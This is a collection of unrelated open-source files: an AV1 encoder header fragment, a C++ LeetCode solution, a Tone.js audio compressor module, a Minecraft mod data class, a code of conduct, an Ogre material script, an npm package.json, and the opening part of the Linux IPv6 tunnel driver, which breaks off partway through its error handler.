    EbByte mc_flow_rec_picture_buffer[MAX_TPL_LA_SW];
    EbByte mc_flow_rec_picture_buffer_saved;
    FrameInfo frame_info;
    TwoPassCfg two_pass_cfg; // two pass datarate control
    RATE_CONTROL rc;
    RateControlCfg rc_cfg;
    GF_GROUP gf_group;
    KeyFrameCfg kf_cfg;
    GFConfig gf_cfg;
    FIRSTPASS_STATS *frame_stats_buffer;
    // Number of stats buffers required for look ahead
    int num_lap_buffers;
    STATS_BUFFER_CTX stats_buf_context;
    SvtAv1FixedBuf rc_twopass_stats_in; // replaced oxcf->two_pass_cfg.stats_in in aom
    FirstPassStatsOut stats_out;
} EncodeContext;
/* Placeholder init-data type for encode_context_ctor (no real fields yet). */
typedef struct EncodeContextInitData {
    int32_t junk;
} EncodeContextInitData;
/**************************************
* Extern Function Declarations
**************************************/
extern EbErrorType encode_context_ctor(EncodeContext *encode_context_ptr,
EbPtr object_init_data_ptr);
#endif // EbEncodeContext_h
| {
"pile_set_name": "Github"
} |
/// Source : https://leetcode.com/problems/split-array-with-same-average/description/
/// Author : liuyubobobo
/// Time : 2018-03-24
#include <iostream>
#include <vector>
#include <numeric>
#include <unordered_set>
using namespace std;
/// Dynamic Programming
///
/// Suppose the same average is ave, then ave = sum(A) / len(A)
/// Try how many items B contains from 1 to len(A)/2
/// Suppose B contains i items, then sum(B) = i * ave
/// This sub-problem can be solved by dynamic programming
///
/// Time Complexity: O(len(A) * len(A) * sum(A))
/// Space Complexity: O(len(A) * sum(A))
class Solution {

public:
    /// Return true iff A can be split into two non-empty parts B and C
    /// with avg(B) == avg(C).  If B holds k of the n elements, then
    /// sum(B) must equal total * k / n, so try every k up to n / 2 and
    /// check whether some k-subset reaches that exact sum.
    bool splitArraySameAverage(vector<int>& A) {

        const int n = A.size();
        const int total = accumulate(A.begin(), A.end(), 0);

        for(int k = 1; k <= n / 2; k ++)
            if((total * k) % n == 0 && ok(A, (total * k) / n, k))
                return true;
        return false;
    }

private:
    /// Can exactly `num` elements of A be chosen whose sum is exactly `c`?
    /// dp[s] holds the set of element counts that can produce the sum s.
    bool ok(const vector<int>& A, int c, int num){

        vector<unordered_set<int>> dp(c + 1, unordered_set<int>());
        dp[0].insert(0);

        for(int value: A)
            // Walk sums downward so each element is used at most once.
            for(int s = c; s >= value; s --){
                const unordered_set<int>& src = dp[s - value];
                if(src.empty())
                    continue;
                // Snapshot first: when value == 0, src aliases dp[s] and we
                // must not insert into the set while iterating over it.
                vector<int> counts(src.begin(), src.end());
                for(int cnt: counts)
                    dp[s].insert(cnt + 1);
            }

        return dp[c].count(num) > 0;
    }
};
/// Print a boolean as the Python-style literals "True" / "False".
void print_bool(bool res){
    const char *label = res ? "True" : "False";
    cout << label << endl;
}
int main() {

    // Each case prints "True" when the array can be split into two
    // non-empty parts with equal averages, "False" otherwise.
    vector<int> case1 = {1, 2, 3, 4, 5, 6, 7, 8};
    print_bool(Solution().splitArraySameAverage(case1));   // True

    vector<int> case2 = {3, 1};
    print_bool(Solution().splitArraySameAverage(case2));   // False

    vector<int> case3 = {18, 10, 5, 3};
    print_bool(Solution().splitArraySameAverage(case3));   // False

    vector<int> case4 = {2, 0, 5, 6, 16, 12, 15, 12, 4};
    print_bool(Solution().splitArraySameAverage(case4));   // True

    return 0;
}
"pile_set_name": "Github"
} |
<< conf/
| {
"pile_set_name": "Github"
} |
define(["Tone/core/Tone", "Tone/component/MidSideSplit", "Tone/component/MidSideMerge",
	"Tone/component/Compressor"], function(Tone){

	"use strict";

	/**
	 *  @class Tone.MidSideCompressor applies two different compressors to the mid
	 *         and side signal components. See Tone.MidSideSplit.
	 *
	 *  @extends {Tone}
	 *  @param {Object} options The options that are passed to the mid and side
	 *                          compressors.
	 *  @constructor
	 */
	Tone.MidSideCompressor = function(options){

		options = this.defaultArg(options, Tone.MidSideCompressor.defaults);

		/**
		 *  the mid/side split
		 *  @type  {Tone.MidSideSplit}
		 *  @private
		 */
		this._midSideSplit = this.input = new Tone.MidSideSplit();

		/**
		 *  the mid/side recombination
		 *  @type  {Tone.MidSideMerge}
		 *  @private
		 */
		this._midSideMerge = this.output = new Tone.MidSideMerge();

		/**
		 *  The compressor applied to the mid signal
		 *  @type  {Tone.Compressor}
		 */
		this.mid = new Tone.Compressor(options.mid);

		/**
		 *  The compressor applied to the side signal
		 *  @type  {Tone.Compressor}
		 */
		this.side = new Tone.Compressor(options.side);

		// signal path: input -> split -> per-component compressor -> merge -> output
		this._midSideSplit.mid.chain(this.mid, this._midSideMerge.mid);
		this._midSideSplit.side.chain(this.side, this._midSideMerge.side);
		// prevent external reassignment of the compressor members
		this._readOnly(["mid", "side"]);
	};

	Tone.extend(Tone.MidSideCompressor);

	/**
	 *  Default settings for the mid and side compressors.
	 *  @const
	 *  @static
	 *  @type  {Object}
	 */
	Tone.MidSideCompressor.defaults = {
		"mid" : {
			"ratio" : 3,
			"threshold" : -24,
			"release" : 0.03,
			"attack" : 0.02,
			"knee" : 16
		},
		"side" : {
			"ratio" : 6,
			"threshold" : -30,
			"release" : 0.25,
			"attack" : 0.03,
			"knee" : 10
		}
	};

	/**
	 *  Clean up: dispose the internal nodes and null the references so the
	 *  audio nodes can be garbage collected.
	 *  @returns {Tone.MidSideCompressor} this
	 */
	Tone.MidSideCompressor.prototype.dispose = function(){
		Tone.prototype.dispose.call(this);
		this._writable(["mid", "side"]);
		this.mid.dispose();
		this.mid = null;
		this.side.dispose();
		this.side = null;
		this._midSideSplit.dispose();
		this._midSideSplit = null;
		this._midSideMerge.dispose();
		this._midSideMerge = null;
		return this;
	};

	return Tone.MidSideCompressor;
});
"pile_set_name": "Github"
} |
package com.carpentersblocks.data;
import com.carpentersblocks.tileentity.TEBase;
public class FlowerPot {

    /**
     * 16-bit data components:
     *
     * [0000] [0000] [00000000]
     * Unused Angle  Unused
     */

    public final static byte COLOR_NATURAL = 0;
    public final static byte COLOR_ENRICHED = 1;

    /** Mask selecting the four angle bits within the data word. */
    private final static int ANGLE_MASK = 0xf00;

    /** Number of bits the angle field is shifted within the data word. */
    private final static int ANGLE_SHIFT = 8;

    /**
     * Returns angle as value from 0 to 15.
     */
    public static int getAngle(TEBase TE)
    {
        return (TE.getData() & ANGLE_MASK) >> ANGLE_SHIFT;
    }

    /**
     * Sets angle as value from 0 to 15.
     */
    public static void setAngle(TEBase TE, int angle)
    {
        int data = TE.getData() & ~ANGLE_MASK;
        TE.setData(data | (angle << ANGLE_SHIFT));
    }
}
| {
"pile_set_name": "Github"
} |
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at [email protected]. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq
| {
"pile_set_name": "Github"
} |
// T4ShieldEvil genrated by blender2ogre 0.6.0
import RTSS/NormalMapping_MultiPass from "RTShaderSystem.material"
material T4ShieldEvil : RTSS/NormalMapping_MultiPass
{
receive_shadows on
technique
{
pass lighting
{
// Override the normal map.
rtshader_system
{
lighting_stage normal_map T4ShieldEvilNormal.png object_space 0 bilinear 1 -1.0
}
}
pass decal
{
ambient 0.8 0.8 0.8 1.0
diffuse 0.65 0.65 0.65 1.0
specular 0.0 0.0 0.0 0.0 2.0
emissive 0.0 0.0 0.0 0.0
texture_unit decalmap
{
texture T4ShieldEvil.png
tex_address_mode wrap
scale 1.0 1.0
colour_op modulate
}
}
}
} | {
"pile_set_name": "Github"
} |
{
"_args": [
[
{
"raw": "extend-shallow@^2.0.1",
"scope": null,
"escapedName": "extend-shallow",
"name": "extend-shallow",
"rawSpec": "^2.0.1",
"spec": ">=2.0.1 <3.0.0",
"type": "range"
},
"/Users/chengwei/PHP/Sites/kafka-site/node_modules/micromatch"
]
],
"_from": "extend-shallow@>=2.0.1 <3.0.0",
"_id": "[email protected]",
"_inCache": true,
"_location": "/extend-shallow",
"_nodeVersion": "0.12.4",
"_npmUser": {
"name": "jonschlinkert",
"email": "[email protected]"
},
"_npmVersion": "2.10.1",
"_phantomChildren": {},
"_requested": {
"raw": "extend-shallow@^2.0.1",
"scope": null,
"escapedName": "extend-shallow",
"name": "extend-shallow",
"rawSpec": "^2.0.1",
"spec": ">=2.0.1 <3.0.0",
"type": "range"
},
"_requiredBy": [
"/braces",
"/expand-brackets",
"/extglob",
"/fill-range",
"/micromatch",
"/nanomatch",
"/regex-not",
"/set-value",
"/snapdragon",
"/to-regex",
"/union-value/set-value"
],
"_resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz",
"_shasum": "51af7d614ad9a9f610ea1bafbb989d6b1c56890f",
"_shrinkwrap": null,
"_spec": "extend-shallow@^2.0.1",
"_where": "/Users/chengwei/PHP/Sites/kafka-site/node_modules/micromatch",
"author": {
"name": "Jon Schlinkert",
"url": "https://github.com/jonschlinkert"
},
"bugs": {
"url": "https://github.com/jonschlinkert/extend-shallow/issues"
},
"dependencies": {
"is-extendable": "^0.1.0"
},
"description": "Extend an object with the properties of additional objects. node.js/javascript util.",
"devDependencies": {
"array-slice": "^0.2.3",
"benchmarked": "^0.1.4",
"chalk": "^1.0.0",
"for-own": "^0.1.3",
"glob": "^5.0.12",
"is-plain-object": "^2.0.1",
"kind-of": "^2.0.0",
"minimist": "^1.1.1",
"mocha": "^2.2.5",
"should": "^7.0.1"
},
"directories": {},
"dist": {
"shasum": "51af7d614ad9a9f610ea1bafbb989d6b1c56890f",
"tarball": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz"
},
"engines": {
"node": ">=0.10.0"
},
"files": [
"index.js"
],
"gitHead": "e9b1f1d2ff9d2990ec4a127afa7c14732d1eec8a",
"homepage": "https://github.com/jonschlinkert/extend-shallow",
"keywords": [
"assign",
"extend",
"javascript",
"js",
"keys",
"merge",
"obj",
"object",
"prop",
"properties",
"property",
"props",
"shallow",
"util",
"utility",
"utils",
"value"
],
"license": "MIT",
"main": "index.js",
"maintainers": [
{
"name": "jonschlinkert",
"email": "[email protected]"
}
],
"name": "extend-shallow",
"optionalDependencies": {},
"readme": "ERROR: No README data found!",
"repository": {
"type": "git",
"url": "git+https://github.com/jonschlinkert/extend-shallow.git"
},
"scripts": {
"test": "mocha"
},
"version": "2.0.1"
}
| {
"pile_set_name": "Github"
} |
/*
* IPv6 tunneling device
* Linux INET6 implementation
*
* Authors:
* Ville Nuorvala <[email protected]>
* Yasuyuki Kozakai <[email protected]>
*
* Based on:
* linux/net/ipv6/sit.c and linux/net/ipv4/ipip.c
*
* RFC 2473
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/capability.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/sockios.h>
#include <linux/icmp.h>
#include <linux/if.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/net.h>
#include <linux/in6.h>
#include <linux/netdevice.h>
#include <linux/if_arp.h>
#include <linux/icmpv6.h>
#include <linux/init.h>
#include <linux/route.h>
#include <linux/rtnetlink.h>
#include <linux/netfilter_ipv6.h>
#include <linux/slab.h>
#include <linux/hash.h>
#include <linux/etherdevice.h>
#include <asm/uaccess.h>
#include <linux/atomic.h>
#include <net/icmp.h>
#include <net/ip.h>
#include <net/ip_tunnels.h>
#include <net/ipv6.h>
#include <net/ip6_route.h>
#include <net/addrconf.h>
#include <net/ip6_tunnel.h>
#include <net/xfrm.h>
#include <net/dsfield.h>
#include <net/inet_ecn.h>
#include <net/net_namespace.h>
#include <net/netns/generic.h>
/* Module identification; the aliases allow automatic module loading via
 * the rtnl link kind ("ip6tnl") or the fallback device name ("ip6tnl0"). */
MODULE_AUTHOR("Ville Nuorvala");
MODULE_DESCRIPTION("IPv6 tunneling device");
MODULE_LICENSE("GPL");
MODULE_ALIAS_RTNL_LINK("ip6tnl");
MODULE_ALIAS_NETDEV("ip6tnl0");
#ifdef IP6_TNL_DEBUG
#define IP6_TNL_TRACE(x...) pr_debug("%s:" x "\n", __func__)
#else
#define IP6_TNL_TRACE(x...) do {;} while(0)
#endif
/* Tunnel hash table size: 2^5 = 32 buckets keyed on endpoint addresses. */
#define HASH_SIZE_SHIFT 5
#define HASH_SIZE (1 << HASH_SIZE_SHIFT)
/* Writable module parameter: log packets received with corrupted ECN. */
static bool log_ecn_error = true;
module_param(log_ecn_error, bool, 0644);
MODULE_PARM_DESC(log_ecn_error, "Log packets received with corrupted ECN");
/* Hash the two tunnel endpoint addresses into a hash-table bucket index. */
static u32 HASH(const struct in6_addr *addr1, const struct in6_addr *addr2)
{
	return hash_32(ipv6_addr_hash(addr1) ^ ipv6_addr_hash(addr2),
		       HASH_SIZE_SHIFT);
}
/* Forward declarations for the netdev hooks defined later in this file. */
static int ip6_tnl_dev_init(struct net_device *dev);
static void ip6_tnl_dev_setup(struct net_device *dev);
static struct rtnl_link_ops ip6_link_ops __read_mostly;
/* Per-network-namespace id, used with net_generic() to find our state. */
static int ip6_tnl_net_id __read_mostly;
/* Per-netns tunnel state. */
struct ip6_tnl_net {
	/* the IPv6 tunnel fallback device */
	struct net_device *fb_tnl_dev;
	/* lists for storing tunnels in use */
	struct ip6_tnl __rcu *tnls_r_l[HASH_SIZE];	/* hashed by endpoints */
	struct ip6_tnl __rcu *tnls_wc[1];		/* fully wildcarded */
	struct ip6_tnl __rcu **tnls[2];			/* [0]=wc, [1]=r_l */
};
/* Aggregate the per-CPU software stats into dev->stats and return it.
 * The u64_stats seqcount retry loop guarantees each CPU's counters are
 * read consistently even while that CPU is updating them. */
static struct net_device_stats *ip6_get_stats(struct net_device *dev)
{
	struct pcpu_sw_netstats tmp, sum = { 0 };
	int i;
	for_each_possible_cpu(i) {
		unsigned int start;
		const struct pcpu_sw_netstats *tstats =
			per_cpu_ptr(dev->tstats, i);
		do {
			start = u64_stats_fetch_begin_irq(&tstats->syncp);
			tmp.rx_packets = tstats->rx_packets;
			tmp.rx_bytes = tstats->rx_bytes;
			tmp.tx_packets = tstats->tx_packets;
			tmp.tx_bytes = tstats->tx_bytes;
		} while (u64_stats_fetch_retry_irq(&tstats->syncp, start));
		sum.rx_packets += tmp.rx_packets;
		sum.rx_bytes += tmp.rx_bytes;
		sum.tx_packets += tmp.tx_packets;
		sum.tx_bytes += tmp.tx_bytes;
	}
	dev->stats.rx_packets = sum.rx_packets;
	dev->stats.rx_bytes = sum.rx_bytes;
	dev->stats.tx_packets = sum.tx_packets;
	dev->stats.tx_bytes = sum.tx_bytes;
	return &dev->stats;
}
/*
 * Locking : hash tables are protected by RCU and RTNL
 */
/* Return the tunnel's cached dst if still valid; otherwise release it,
 * clear the cache and return NULL.  The cookie saved by
 * ip6_tnl_dst_store() lets dst->ops->check() detect stale routes. */
struct dst_entry *ip6_tnl_dst_check(struct ip6_tnl *t)
{
	struct dst_entry *dst = t->dst_cache;
	if (dst && dst->obsolete &&
	    dst->ops->check(dst, t->dst_cookie) == NULL) {
		t->dst_cache = NULL;
		dst_release(dst);
		return NULL;
	}
	return dst;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_check);
/* Drop the tunnel's cached route (if any) so the next transmit
 * performs a fresh route lookup. */
void ip6_tnl_dst_reset(struct ip6_tnl *t)
{
	dst_release(t->dst_cache);
	t->dst_cache = NULL;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_reset);
/* Cache @dst on the tunnel, remembering the fib node serial number as a
 * validity cookie for ip6_tnl_dst_check().  Any previously cached entry
 * is released. */
void ip6_tnl_dst_store(struct ip6_tnl *t, struct dst_entry *dst)
{
	struct rt6_info *rt = (struct rt6_info *) dst;
	t->dst_cookie = rt->rt6i_node ? rt->rt6i_node->fn_sernum : 0;
	dst_release(t->dst_cache);
	t->dst_cache = dst;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_store);
/**
 * ip6_tnl_lookup - fetch tunnel matching the end-point addresses
 * @net: network namespace to search
 * @remote: the address of the tunnel exit-point
 * @local: the address of the tunnel entry-point
 *
 * Tries three lookups of decreasing specificity: exact (remote, local)
 * pair, then local-only (wildcard remote), then remote-only (wildcard
 * local).  Must be called under rcu_read_lock().
 *
 * Return:
 *   tunnel matching given end-points if found,
 *   else fallback tunnel if its device is up,
 *   else %NULL
 **/
#define for_each_ip6_tunnel_rcu(start) \
	for (t = rcu_dereference(start); t; t = rcu_dereference(t->next))
static struct ip6_tnl *
ip6_tnl_lookup(struct net *net, const struct in6_addr *remote, const struct in6_addr *local)
{
	unsigned int hash = HASH(remote, local);
	struct ip6_tnl *t;
	struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
	struct in6_addr any;
	for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
		if (ipv6_addr_equal(local, &t->parms.laddr) &&
		    ipv6_addr_equal(remote, &t->parms.raddr) &&
		    (t->dev->flags & IFF_UP))
			return t;
	}
	/* partially wildcarded tunnels are hashed with an all-zero address */
	memset(&any, 0, sizeof(any));
	hash = HASH(&any, local);
	for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
		if (ipv6_addr_equal(local, &t->parms.laddr) &&
		    (t->dev->flags & IFF_UP))
			return t;
	}
	hash = HASH(remote, &any);
	for_each_ip6_tunnel_rcu(ip6n->tnls_r_l[hash]) {
		if (ipv6_addr_equal(remote, &t->parms.raddr) &&
		    (t->dev->flags & IFF_UP))
			return t;
	}
	t = rcu_dereference(ip6n->tnls_wc[0]);
	if (t && (t->dev->flags & IFF_UP))
		return t;
	return NULL;
}
/**
 * ip6_tnl_bucket - get head of list matching given tunnel parameters
 * @ip6n: per-namespace tunnel state
 * @p: parameters containing tunnel end-points
 *
 * Description:
 *   ip6_tnl_bucket() returns the head of the list matching the
 *   &struct in6_addr entries laddr and raddr in @p.  A tunnel with
 *   both endpoints wildcarded lives in the single-slot tnls_wc list
 *   (prio 0); anything with at least one concrete endpoint is hashed
 *   into tnls_r_l (prio 1).
 *
 * Return: head of IPv6 tunnel list
 **/
static struct ip6_tnl __rcu **
ip6_tnl_bucket(struct ip6_tnl_net *ip6n, const struct __ip6_tnl_parm *p)
{
	unsigned int h = 0;
	int prio = 0;

	if (!(ipv6_addr_any(&p->raddr) && ipv6_addr_any(&p->laddr))) {
		prio = 1;
		h = HASH(&p->raddr, &p->laddr);
	}
	return &ip6n->tnls[prio][h];
}
/**
 * ip6_tnl_link - add tunnel to hash table
 * @ip6n: per-namespace tunnel state
 * @t: tunnel to be added
 *
 * Caller must hold RTNL.  The new node's next pointer is filled before
 * the node is published with rcu_assign_pointer(), so concurrent RCU
 * readers always see a consistent list.
 **/
static void
ip6_tnl_link(struct ip6_tnl_net *ip6n, struct ip6_tnl *t)
{
	struct ip6_tnl __rcu **tp = ip6_tnl_bucket(ip6n, &t->parms);
	rcu_assign_pointer(t->next , rtnl_dereference(*tp));
	rcu_assign_pointer(*tp, t);
}
/**
 * ip6_tnl_unlink - remove tunnel from hash table
 * @ip6n: per-namespace tunnel state
 * @t: tunnel to be removed
 *
 * Caller must hold RTNL.  Walks the bucket to find the predecessor
 * link and splices @t out; only one pointer is rewritten, which keeps
 * concurrent RCU readers safe.
 **/
static void
ip6_tnl_unlink(struct ip6_tnl_net *ip6n, struct ip6_tnl *t)
{
	struct ip6_tnl __rcu **tp;
	struct ip6_tnl *iter;
	for (tp = ip6_tnl_bucket(ip6n, &t->parms);
	     (iter = rtnl_dereference(*tp)) != NULL;
	     tp = &iter->next) {
		if (t == iter) {
			rcu_assign_pointer(*tp, t->next);
			break;
		}
	}
}
/* netdev destructor: free the per-CPU stats, then the device itself. */
static void ip6_dev_free(struct net_device *dev)
{
	free_percpu(dev->tstats);
	free_netdev(dev);
}
/**
 * ip6_tnl_create2 - register a freshly allocated tunnel device
 * @dev: tunnel device whose private area holds a struct ip6_tnl
 *
 * Registers @dev with the networking core, records the final device
 * name (register_netdevice() may have expanded a "%d" template) in the
 * tunnel parameters, and links the tunnel into the per-netns table.
 *
 * Return: 0 on success, negative errno from register_netdevice().
 */
static int ip6_tnl_create2(struct net_device *dev)
{
	/* The original assigned t = netdev_priv(dev) twice; once is enough. */
	struct ip6_tnl *t = netdev_priv(dev);
	struct net *net = dev_net(dev);
	struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
	int err;
	err = register_netdevice(dev);
	if (err < 0)
		goto out;
	strcpy(t->parms.name, dev->name);
	dev->rtnl_link_ops = &ip6_link_ops;
	/* hold a device reference for the hash-table linkage */
	dev_hold(dev);
	ip6_tnl_link(ip6n, t);
	return 0;
out:
	return err;
}
/**
 * ip6_tnl_create - create a new tunnel
 * @net: network namespace the tunnel lives in
 * @p: tunnel parameters
 *
 * Description:
 *   Create tunnel matching given parameters.  If @p carries no name,
 *   the "ip6tnl%d" template is used and the core picks the next free
 *   index at registration time.
 *
 * Return:
 *   created tunnel or error pointer
 **/
static struct ip6_tnl *ip6_tnl_create(struct net *net, struct __ip6_tnl_parm *p)
{
	struct net_device *dev;
	struct ip6_tnl *t;
	char name[IFNAMSIZ];
	int err = -ENOMEM;
	if (p->name[0])
		strlcpy(name, p->name, IFNAMSIZ);
	else
		/* plain copy of the fixed template; the old
		 * sprintf(name, "ip6tnl%%d") ran the format engine just
		 * to produce this constant string */
		strcpy(name, "ip6tnl%d");
	dev = alloc_netdev(sizeof(*t), name, NET_NAME_UNKNOWN,
			   ip6_tnl_dev_setup);
	if (dev == NULL)
		goto failed;
	dev_net_set(dev, net);
	t = netdev_priv(dev);
	t->parms = *p;
	t->net = dev_net(dev);
	err = ip6_tnl_create2(dev);
	if (err < 0)
		goto failed_free;
	return t;
failed_free:
	ip6_dev_free(dev);
failed:
	return ERR_PTR(err);
}
/**
 * ip6_tnl_locate - find or create tunnel matching given parameters
 * @net: network namespace to search
 * @p: tunnel parameters
 * @create: != 0 if allowed to create new tunnel if no match found
 *
 * Description:
 *   ip6_tnl_locate() first tries to locate an existing tunnel
 *   based on @p. If this is unsuccessful, but @create is set a new
 *   tunnel device is created and registered for use.
 *   Caller must hold RTNL (the list is walked with rtnl_dereference()).
 *
 * Return:
 *   matching tunnel, or error pointer: -EEXIST when @create is set but
 *   a match already exists, -ENODEV when !@create and nothing matches.
 **/
static struct ip6_tnl *ip6_tnl_locate(struct net *net,
		struct __ip6_tnl_parm *p, int create)
{
	const struct in6_addr *remote = &p->raddr;
	const struct in6_addr *local = &p->laddr;
	struct ip6_tnl __rcu **tp;
	struct ip6_tnl *t;
	struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
	for (tp = ip6_tnl_bucket(ip6n, p);
	     (t = rtnl_dereference(*tp)) != NULL;
	     tp = &t->next) {
		if (ipv6_addr_equal(local, &t->parms.laddr) &&
		    ipv6_addr_equal(remote, &t->parms.raddr)) {
			if (create)
				return ERR_PTR(-EEXIST);
			return t;
		}
	}
	if (!create)
		return ERR_PTR(-ENODEV);
	return ip6_tnl_create(net, p);
}
/**
 * ip6_tnl_dev_uninit - tunnel device uninitializer
 * @dev: the device to be destroyed
 *
 * Description:
 *   ip6_tnl_dev_uninit() removes tunnel from its list.  The fallback
 *   device only clears the wildcard slot; regular tunnels are unlinked
 *   from the hash table.  Also drops the cached route and the device
 *   reference taken in ip6_tnl_create2().
 **/
static void
ip6_tnl_dev_uninit(struct net_device *dev)
{
	struct ip6_tnl *t = netdev_priv(dev);
	struct net *net = t->net;
	struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
	if (dev == ip6n->fb_tnl_dev)
		RCU_INIT_POINTER(ip6n->tnls_wc[0], NULL);
	else
		ip6_tnl_unlink(ip6n, t);
	ip6_tnl_dst_reset(t);
	dev_put(dev);
}
/**
 * ip6_tnl_parse_tlv_enc_lim - handle encapsulation limit option
 * @skb: received socket buffer
 * @raw: pointer to the inner IPv6 header within skb->data
 *
 * Walks the IPv6 extension header chain looking for a tunnel
 * encapsulation limit TLV inside a destination options header.
 *
 * Return:
 *   0 if none was found,
 *   else offset of the encapsulation limit option relative to @raw
 **/
__u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
{
	const struct ipv6hdr *ipv6h = (const struct ipv6hdr *)raw;
	/* Work with offsets from skb->data instead of @raw-based
	 * pointers: pskb_may_pull() may reallocate skb->head, which
	 * invalidated every pointer the original code kept using. */
	unsigned int nhoff = raw - skb->data;
	unsigned int off = nhoff + sizeof(*ipv6h);
	u8 next, nexthdr = ipv6h->nexthdr;
	while (ipv6_ext_hdr(nexthdr) && nexthdr != NEXTHDR_NONE) {
		struct ipv6_opt_hdr *hdr;
		u16 optlen;
		if (!pskb_may_pull(skb, off + sizeof(*hdr)))
			break;
		/* recompute from skb->data after every pull */
		hdr = (struct ipv6_opt_hdr *)(skb->data + off);
		if (nexthdr == NEXTHDR_FRAGMENT) {
			struct frag_hdr *frag_hdr = (struct frag_hdr *)hdr;
			/* options are only parsed in the first fragment */
			if (frag_hdr->frag_off)
				break;
			optlen = 8;
		} else if (nexthdr == NEXTHDR_AUTH) {
			/* AH hdrlen is in 32-bit words minus two */
			optlen = (hdr->hdrlen + 2) << 2;
		} else {
			optlen = ipv6_optlen(hdr);
		}
		/* cache hdr->nexthdr: the pull below may invalidate hdr */
		next = hdr->nexthdr;
		if (nexthdr == NEXTHDR_DEST) {
			u16 i = 2;
			/* hdr is no longer valid after this pull */
			if (!pskb_may_pull(skb, off + optlen))
				break;
			while (1) {
				struct ipv6_tlv_tnl_enc_lim *tel;
				/* No more room for encapsulation limit */
				if (i + sizeof(*tel) > optlen)
					break;
				tel = (struct ipv6_tlv_tnl_enc_lim *)(skb->data + off + i);
				/* return index of option if found and valid */
				if (tel->type == IPV6_TLV_TNL_ENCAP_LIMIT &&
				    tel->length == 1)
					return i + off - nhoff;
				/* else jump to next option */
				if (tel->type)
					i += tel->length + 2;
				else
					i++;
			}
		}
		nexthdr = next;
		off += optlen;
	}
	return 0;
}
EXPORT_SYMBOL(ip6_tnl_parse_tlv_enc_lim);
/**
 * ip6_tnl_err - tunnel error handler
 * @skb: the ICMPv6 error packet
 * @ipproto: tunnel payload protocol this handler was registered for
 * @opt: IPv6 control buffer of @skb
 * @type/@code/@msg/@info: in/out ICMP parameters; on return they hold
 *	the error (if any) that should be relayed to the inner sender
 * @offset: offset of the embedded original packet within @skb
 *
 * Description:
 *   ip6_tnl_err() should handle errors in the tunnel according
 *   to the specifications in RFC 2473.
 *
 * Return: 0 when a tunnel was found and the error processed,
 *	   -ENOENT when no matching tunnel exists.
 **/
static int
ip6_tnl_err(struct sk_buff *skb, __u8 ipproto, struct inet6_skb_parm *opt,
	    u8 *type, u8 *code, int *msg, __u32 *info, int offset)
{
	const struct ipv6hdr *ipv6h = (const struct ipv6hdr *) skb->data;
	struct ip6_tnl *t;
	int rel_msg = 0;
	u8 rel_type = ICMPV6_DEST_UNREACH;
	u8 rel_code = ICMPV6_ADDR_UNREACH;
	u8 tproto;
	__u32 rel_info = 0;
	__u16 len;
	int err = -ENOENT;
	/* If the packet doesn't contain the original IPv6 header we are
	   in trouble since we might need the source address for further
	   processing of the error. */
	rcu_read_lock();
	/* outer header is the error packet, so daddr/saddr are swapped
	 * relative to the tunnel's own orientation */
	t = ip6_tnl_lookup(dev_net(skb->dev), &ipv6h->daddr, &ipv6h->saddr);
	if (t == NULL)
		goto out;
	tproto = ACCESS_ONCE(t->parms.proto);
	if (tproto != ipproto && tproto != 0)
		goto out;
	err = 0;
	switch (*type) {
		__u32 teli;
		struct ipv6_tlv_tnl_enc_lim *tel;
		__u32 mtu;
	case ICMPV6_DEST_UNREACH:
		net_warn_ratelimited("%s: Path to destination invalid or inactive!\n",
				     t->parms.name);
		rel_msg = 1;
		break;
	case ICMPV6_TIME_EXCEED:
